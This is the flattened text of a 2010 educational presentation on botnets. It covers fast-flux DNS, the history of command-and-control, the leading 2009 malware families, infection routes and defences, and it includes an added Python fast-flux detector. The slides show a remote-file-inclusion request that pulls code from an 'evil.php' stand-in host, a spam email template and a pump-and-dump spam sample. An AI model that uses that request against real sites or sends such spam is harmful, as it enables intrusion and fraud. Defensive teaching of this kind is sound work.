A Presentation For IDC 2010
Copyright Craig Schiller, 2010. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.
12/08/21 © 2009 Craig A Schiller AOD - 2
Handbook Against the AOD
Agenda
• Botnet Overview
• Botnet Schemes
• How Do They Get In?
• What Can We Do?
• Concluding Thoughts
• Multi-homed DNS
– FQDN maps to 3 or more IP addresses
botnet1.example.com pointing to 127.0.0.1
botnet1.example.com pointing to 127.0.0.2
botnet1.example.com pointing to 127.0.0.3
botnet1.example.com pointing to 127.0.0.4
botnet1.example.com pointing to 127.0.0.5
botnet1.example.com pointing to 127.0.0.6
– Dynamic DNS used through a commercial site
– Change IP addresses quickly
• Short DNS TTLs for clients
– Remap DNS often, check at boot
• FastFlux DNS
– Change IP addresses and/or DNS names quickly (for spam, < 5 minutes) and often
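The multi-homed and fast-flux patterns listed above can be told apart from ordinary load balancing by watching repeated lookups of one name. The following is an added example, not code from the slides: it classifies a series of constructed DNS answers by distinct IP count, minimum TTL, churn between answers and the number of unrelated /24 prefixes. The thresholds (3 IPs, 300 s TTL) and the sample data are assumptions.

```python
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class Lookup:
    """One DNS answer for a single FQDN (constructed sample data below)."""
    ts: int               # seconds since the start of observation
    ttl: int              # TTL on the returned A records
    answers: frozenset    # IPv4 addresses returned in this answer


def analyze(lookups, min_ips=3, max_ttl=300):
    """Summarise repeated lookups of one name; min_ips/max_ttl are assumed thresholds."""
    if not lookups:
        return {"verdict": "no-data"}
    ordered = sorted(lookups, key=lambda look: look.ts)
    all_ips = set().union(*(look.answers for look in ordered))
    # Fast-flux pools tend to span many unrelated /24s (compromised hosts);
    # a load-balanced server usually sits in one provider range.
    prefixes = {ip_network(f"{ip}/24", strict=False) for ip in all_ips}
    changes = sum(1 for a, b in zip(ordered, ordered[1:]) if a.answers != b.answers)
    churn = changes / (len(ordered) - 1) if len(ordered) > 1 else 0.0
    min_ttl = min(look.ttl for look in ordered)
    if len(all_ips) >= min_ips and min_ttl <= max_ttl and churn > 0:
        verdict = "fast-flux"        # many IPs, short TTL, answers keep changing
    elif len(all_ips) >= min_ips:
        verdict = "multi-homed"      # many IPs but a stable answer set
    else:
        verdict = "normal"
    return {"distinct_ips": len(all_ips), "distinct_prefixes": len(prefixes),
            "min_ttl": min_ttl, "churn": churn, "verdict": verdict}


# Constructed observations (RFC 5737 documentation addresses).
FLUX = [  # answers rotate every poll, TTL 60 s, three unrelated /24s
    Lookup(0, 60, frozenset({"192.0.2.10", "198.51.100.7", "203.0.113.55"})),
    Lookup(120, 60, frozenset({"192.0.2.10", "198.51.100.9", "203.0.113.56"})),
    Lookup(240, 60, frozenset({"192.0.2.11", "198.51.100.9", "203.0.113.57"})),
]
STATIC = [  # same three servers every time, long TTL: ordinary load balancing
    Lookup(t, 3600, frozenset({"192.0.2.20", "192.0.2.21", "192.0.2.22"}))
    for t in (0, 3600, 7200)
]
NORMAL = [Lookup(t, 3600, frozenset({"192.0.2.30"})) for t in (0, 3600)]

if __name__ == "__main__":
    for label, obs in (("flux", FLUX), ("static", STATIC), ("normal", NORMAL)):
        print(label, analyze(obs))
```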
Hiding the C&C Server or Phishing Website
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
Microsoft Senior Security Manager says botnets are the biggest threat of 2007.
Vincent Cerf, founder of the Internet, tells a global finance conference that one quarter of
all computers belong to botnets.
Norman Elton and Matt Keel from the College of William & Mary, in a 2005
presentation, called bot networks “the single greatest threat facing humanity.”
John Macanan, in “The Evolution of Malicious IRC Bots,” says that botnets are
“the most dangerous and widespread Win32 viral threat.”
Microsoft reports that of the 5.7 million unique Windows systems from which
the MSRT removed malware, 62% were found to have a Trojan or bot client.
Ryan Narraine, a writer for eWeek, said that botnets are “the key hub for well
organized crime rings around the globe, using stolen bandwidth from drone
zombies to make money from nefarious Internet activity.”
[Diagram: C&C of a traditional botnet over the IRC protocol, and C&C of remotely controlled clients via Terminal Services, VNC, RDP, Carbon Copy, BackOrifice and SubSeven]
Now, many include the systems that execute commands of the botherder even if the
malicious code is not present. These systems are remotely controlled. They would
be considered bot clients if they were part of a “net” of remotely controlled clients,
even if the “bot” mechanism is somewhere else.
Command & Control Today
[Timeline: bot evolution 1988-2006]
1988: Invention of IRC.
1989: Greg Lindahl invents GM, the first bot; GM plays “Hunt the Wumpus” with IRC users.
1999: Pretty Park discovered; the first worm to use an IRC server as a means of remote control.
1999: SubSeven trojan/bot; a remote control trojan that added control via IRC.
2000: GT Bot, mIRC based; runs scripts in response to IRC server events; supports raw TCP and UDP socket connections.
2002: SDBot, written in C++; source code available to the hacker community; small, single binary.
2002: AgoBot, Gaobot; introduces modular design: the 1st module breaks in and downloads the 2nd module, the 2nd module turns off anti-virus and downloads the 3rd module, and module 3 has the attack engines/payload.
2003: SpyBot; spyware capabilities (keylogging, data mining for email addresses, lists of URLs, etc.).
2003: RBot; most prevalent bot today; spreads through weak passwords; easily modifiable; hides from detection; uses packaging software.
2004: PolyBot; a derivative of AgoBot with polymorphic ability; changes the look of its code on every infection.
2005: MYTOB; My Doom mass emailing worm with bot IRC C&C.
[Diagram: RBN (Russian Business Network) and related entities: OINVEST, SPB IX, DELTASYS, INFOBOX, DATAPOINT. Ref: Bizeul.org]
Bot client lifecycle (adaptive, targetable):
• Retrieve the payload module
• Report the result to the C&C channel
• Listen to the C&C server/peer for commands
• Execute the commands
• On command, erase all evidence and abandon the client
Botnet Client communication
No. 1: Zeus aka Z-bot; financial Trojan, keystroke logger, MITB; 3.6M
No. 2: Koobface; social engineering, trojaned codec, bot client; 2.9M
No. 3: TidServ; trojaned spam attachment, rootkit, see #4; 1.5M
No. 4: Trojan.Fakeavalert; social engineering delivery vehicle; 1.4M
No. 5: TR/Dldr.Agent.JKH; remote control Trojan, sends encrypted data to C&C, Clikbot; 1.2M
No. 6: Monkif; middleware, attempts to download adware BHO; .5M
No. 7: Hamweq aka IRC Brute; an autorun worm, downloader; .48M
No. 8: Swizzor; Trojan dropper, installs adware; .37M
No. 9: Gammima aka Gamania, Frethog, Vaklik and Krap; steals online game account info, rootkit, spreads on USB; .23M
No. 10: Conficker aka Downadup; propagates 4 ways; .21M
2009 Top 10 Malware Families
[Chart: Koobface, Zeus, Tidserv, Monkif, Conficker, Vundo, Swizzor, Hamweq, Sinowal, Matcash; 3 arrested; 12.7M]
(http://www.barracudacentral.org/index.cgi?p=spam)
%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME
%MESSAGE_BODY
Pump & Dump Stocks
Making Dollars and Sense Now is The Time!
SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy
But, of course, “Once you have paid him the Dane-geld, you never get rid of the Dane.”
Dane-geld, by Rudyard Kipling (A.D. 980-1016 )
• Phishing attacks
• Pharming attacks
[Diagram: botnet client sends spam]
How do they get in?
We are a trading company that is into the hire, sales and service of Electrical
Trucks, Fork Trucks and associated materials handling equipments and diverse
range of battery for electric vehicles which can be readily adapted for customers
specific requirements to the America and selected locations in Europe.
[Diagram: remote file inclusion. 1. Attacker sends GET /a.php?vuln=http://webhost.com/evil.php to Target.com, which then fetches the included file from Webhost.com]
http://www.wired.com/politics/security/news/2007/11/mac_trojan
Best Bot left the A/V tray icon and a fake GUI
[Diagram: botnet sensors and a security researcher (Wormwatch mailing list) report to the security team, which identifies the computer or user and re-images the computer]
• Nanog
• Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
• Castlecops.com (MIRT, PIRT)
• Vendor
• ISC Storm Center
• APWG
• http://www.bleedingthreats.net/fwrules/
Referencing “The Irretrievable Losses of Malware-Enabled ACH and Wire Fraud”: a separate machine (or machines) used SOLELY for institutional online banking operations (and used for all such operations) is STRONGLY RECOMMENDED. Useful technical and policy controls include:
+ Don't make the machine part of a Windows domain. Administer the machine using a local administrator account.
+ Shut the machine down when not in use.
+ Implement very aggressive firewall and possibly proxy protections for the system. All non-banking traffic should be denied.
+ Aggressively monitor traffic to and from the system.
+ Place the machine on a separate VLAN, on a secure dedicated hard-wired network connection.
Questions?